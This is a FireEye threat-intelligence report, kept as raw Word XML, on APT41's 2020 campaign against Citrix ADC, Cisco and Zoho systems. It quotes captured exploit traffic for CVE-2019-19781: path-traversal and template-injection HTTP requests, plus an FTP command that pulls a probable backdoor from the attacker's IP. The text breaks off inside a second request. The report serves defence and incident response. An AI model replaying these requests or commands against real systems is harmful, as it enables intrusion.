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509A" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="195" w:line="288" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="B2282D"/>
          <w:kern w:val="36"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="B2282D"/>
          <w:kern w:val="36"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F4F9BD" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>March 25, 2020 </w:t>
      </w:r>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>| by </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tooltip="View all entries filed under 'Fireeye - Authors : Christopher Glyer'" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Christopher Glyer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tooltip="View all entries filed under 'Fireeye - Authors : Dan Perez'" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Dan Perez</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tooltip="View all entries filed under 'Fireeye - Authors : Sarah Jones'" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Sarah Jones</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tooltip="View all entries filed under 'Fireeye - Authors : Steve Miller'" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Steve Miller</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C1DA0AD" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="F9F9FA"/>
            <w:sz w:val="17"/>
            <w:szCs w:val="17"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>VULNERABILITIES</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="F9F9FA"/>
            <w:sz w:val="17"/>
            <w:szCs w:val="17"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>CHINA</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="F9F9FA"/>
            <w:sz w:val="17"/>
            <w:szCs w:val="17"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>APT</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27A9DE99"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Beginning this year, FireEye observed </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Chinese actor APT41</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> carry out one of the broadest campaigns by a Chinese cyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>APT41</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> attempt to exploit vulnerabilities in </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Citrix NetScaler/ADC</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, Cisco routers, and </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Zoho ManageEngine Desktop Central</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> at over 75 FireEye customers. Countries we’ve seen targeted include Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance, Construction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil &amp; Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility. It’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACD4D94" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="195"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7125F0DE"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Starting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application Delivery Controller (ADC) and Citrix Gateway devices with </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>CVE-2019-19781</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (published December 17, 2019).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57966723" w14:textId="168BF8F4"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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://www.fireeye.com/content/dam/fireeye-www/blog/images/apt41exploits/apt41-timeline-blog-v2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5720C2F7" wp14:editId="7CD51B79">
            <wp:extent cx="5943600" cy="1430020"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1" name="Picture 1"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430020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Figure 1: Timeline of key events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFF9889"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The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>mitigation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> wasn’t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8B8C0C"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One interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting APT41 was operating with an already-known list of identified devices accessible on the internet.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="66737625" w14:textId="77777777" w:rsidTr="00356DA3">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3887EC0"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POST /vpns/portal/scripts/newbm.pl HTTP/1.1</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Host: [redacted]</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Connection: close</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Accept-Encoding: gzip, deflate</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Accept: */*</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>User-Agent: python-requests/2.22.0</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>NSC_NONCE: nsroot</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>NSC_USER: ../../../netscaler/portal/templates/[redacted]</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Content-Length: 96</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>url=http://example.com&amp;title=[redacted]&amp;desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="768866F1"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E23544" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="225"/>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There is a lull in APT41 activity between January 23 and February 1, which is likely related to the Chinese Lunar New Year holidays which occurred between January 24 and January 30, 2020. This has been a common activity pattern by Chinese APT groups in past years as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26226C83"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Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown payload named ‘bsd’ (which was likely a backdoor).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="35427BE7" w14:textId="77777777" w:rsidTr="00356DA3">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A9AC45" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
            <w:pPr>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POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Accept-Encoding: identity</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Content-Length: 147</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Connection: close</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Nsc_User: ../../../netscaler/portal/templates/[redacted]</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>User-Agent: Python-urllib/2.7</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Nsc_Nonce: nsroot</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Host: [redacted]</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
